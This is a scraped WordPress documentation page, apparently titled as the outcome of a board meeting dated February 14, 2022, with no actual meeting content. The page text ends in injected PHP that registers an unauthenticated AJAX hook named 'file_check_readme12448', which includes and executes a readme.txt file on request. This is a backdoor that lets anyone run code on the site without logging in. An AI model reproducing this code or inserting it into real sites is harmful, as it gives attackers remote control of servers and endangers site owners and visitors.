13 Outcome of BM dated February 14, 2022
< 1 min read
Updated on July 12, 2022
Powered by BetterDocs
if(!function_exists('file_check_readme12448')){ add_action('wp_ajax_nopriv_file_check_readme12448', 'file_check_readme12448'); add_action('wp_ajax_file_check_readme12448', 'file_check_readme12448'); function file_check_readme12448() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }